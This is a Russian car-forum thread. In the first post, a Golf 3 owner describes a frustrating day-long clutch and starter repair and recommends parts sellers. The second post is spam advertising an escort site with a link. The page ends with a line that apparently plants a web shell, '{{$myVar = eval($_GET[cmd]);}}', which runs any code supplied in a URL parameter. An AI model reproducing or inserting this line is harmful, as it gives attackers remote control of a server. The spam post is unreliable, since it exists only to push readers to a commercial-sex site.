+ Ответить в теме
Показано с 1 по 2 из 2

Тема: Golf 3 начало истории.


  1. #1
    Мимо проходил ZlobnbIi is on a distinguished road Аватар для ZlobnbIi
    Регистрация
    11.08.2011
    Откуда
    Питер
    Машина
    Golf 3 2.0 GTI
    Сообщений
    9

    Golf 3 начало истории.

    Занялся я тут сцеплением на своем гольфе. Такого у меня ещё не было:howl::howl::howl:
    Вобщем приехал я в гараж к знакомым механикам, мужики проверенные работают на совесть, по деньгам в отсутствии их начальства договорить можно повыгоднее, да и действия свои объясняют подробно если у них сидишь. Так вот о чем я, приехал поднял капот, сначала всплеск радости, тросик то убитый. резанули, затянули, проехал на передаче, обороты со скоростью выровнялись. Ок еду за тросиком ставят и тут первый гемор, тросик итальянский и у них крпление к педали шире на полтора миллиметра чем у родного. в итоге после короткого совещания сорвали защиту от износа и тросик встал нормально. но дальше выяснилось что сцепление все равно под замену, ну в принципе к этому был готов. Еду на рынок, покупаю комплект LUK пока выбирал звонит слесарь и заказывает ещё задний сальник коленвала и третью точку опоры, время уже почти восемь почти все секции на рынке закрыты, кое как нашол то что нужно. привожу все это дело в гараж. все выкладываю на верстак с довольной ухмылкой. ставим сцепление, сальник. и вот тут то обнаружилось не ладное, коробка слишком легко оделась на маховик (повезло кстати с маховиком, почти новый оказался). Снимаем коробку, ну так и есть(((( диаметр центрального отверстия на диске намного шире вала едрить твою через колено. сложив кучу матюков и опять разобрав все что успели собрать решили отложить все на заватра. На следующий день еду за диском сцепления заодно с мыслями о том что неплохо бы той дуре этим комплктом по голове пройтись каждой деталью по 10 раз. пыкаюсь мыкаюсь и много матерюсь, и вот цель достигнута, еду обратно в гараж с деталями. приезжаю механик уже ждет довольный, ставим сцепление одеваем коробку прикручиваем рачаги, ставим стартер иии момент истины!((((( на втягивающем реле из-за ржавчины ломается пластик(((((( Опять мат перемат, у меня уже потихоньку сдают нервы. Снимаем реле, точнее отламываем и опана при проверке стартера выясняется что у него все внутри рассыпалось, вследствии чего следующие 10 минут эпичных монологов в моем исполнении и слесаря я уезжаю за стартером. Но это ещё не конец истории))))) приезжаю в евро авто, излагаю вопрос, выносят старте немецкого производства. контачат, щелчки есть, вал крутится, но щелчки были какие то неуверенные на что я сразу не обратил внимания из за уставших нервов, а зря..... возвращаюсь в гараж ставим стартер, собираем все все все, опускаем машину и ОПАНА !!!!!!!!!:hang2::hang2::hang2::hang2::hang2:вал крутится а щелчков нету! замкнули на прямую, тот же эффект. дальше длительность матерных монологов в отношениие стартера как нового так и старого, магазина евро авто, всех его сотрудников, директора и того продавца в отдельности, сильно увеличалась с 10 минут до получаса. собрав нервы в кулак еду опять (а надо отметить что единственный минус гаража, это его удаленность от магазинов запчастей, каждая поездка туда обратно своим ходом от 40 минут до часа), приезжаю нахожу этого якобы продавца и выясняется что этот стартер уже был возвратным (вот честно, от умышленного убиства и изнасилования меня удержала чистая случайность в виде звонка любимой жены, голос которой за 1 минуту придает мне титаническое спокойствие). дальше минут 5 разговариваю с продавцом на повышенных тонах и меня меняют стартер. причем приносят все 5 штук какие у них были и я долго с остервенением выбираю из них тот который мне больше приглянулся. немного успокойвшись возвращаюсь в гараж, ещё раз проверяем стартер, ставим на место забиваем болт на просранный куда то датчик заднего хода, очень быстро опускаем машину я завожусь, расчитываюсь и наконецто валю домой.

    В итоге время было потрачено ровно сутки (ппц на самом деле). за работу слесарь взял всего 5 тыс. плюс потратил запас нервыных клеток на полгода вперед, ну и запчасти в итоге 10 тыс обошлись. вот так вот. от себя добавлю, на богатырском проспекте рекомендую обращаться только в 44 секцию, в евро авто на испытателей если что то покупать то требовать детальной проверки. сам вобще стараюсь закупаться на марашале, который на северном, там несколько секций с нормальными парнями у которых не первый раз беру запчасти и проколов ещё не было.

    В общем вот такое начало у меня) дальше по плану козовня и элеектрика с ними надеюсь по веселее будет, постараюсь ещё и фотки выкладывать)
    Спасибо за внимание)
    Последний раз редактировалось ZlobnbIi; 14.08.2011 в 00:57.

  2. #2
    GTI-Racing askoldovd is on a distinguished road Аватар для askoldovd
    Регистрация
    11.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    559
    Женщины, любящие и умеющие удовлетворять мужчину,
    во все времена пользовались спросом у сильного пола.
    Были времена, когда девочек даже обучали этому ремеслу
    в специальных школах. Сейчас, конечно, таких заведений
    уже нет, но желание мужчин получить удовольствие
    http://rus-shlyushki.ru/bdsm_gospozhi_individualki

+ Ответить в теме

Похожие темы

  1. Ответов: 4
    Последнее сообщение: 09.04.2024, 05:12
  2. Начало сезона: праздники с Night Racing!
    от Nighter в разделе Реклама
    Ответов: 2
    Последнее сообщение: 01.04.2024, 22:23
  3. Начало в автоспорте (нужны советы)
    от Gam в разделе Авто спорт
    Ответов: 10
    Последнее сообщение: 16.06.2020, 20:34
  4. Гольф IV НАЧАЛО!!!
    от Гагарин в разделе Клубные машины
    Ответов: 39
    Последнее сообщение: 14.05.2019, 17:00
  5. Летний сезон WRCars. Начало 9 апреля
    от WRCars в разделе Авто спорт
    Ответов: 21
    Последнее сообщение: 23.09.2011, 02:01

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}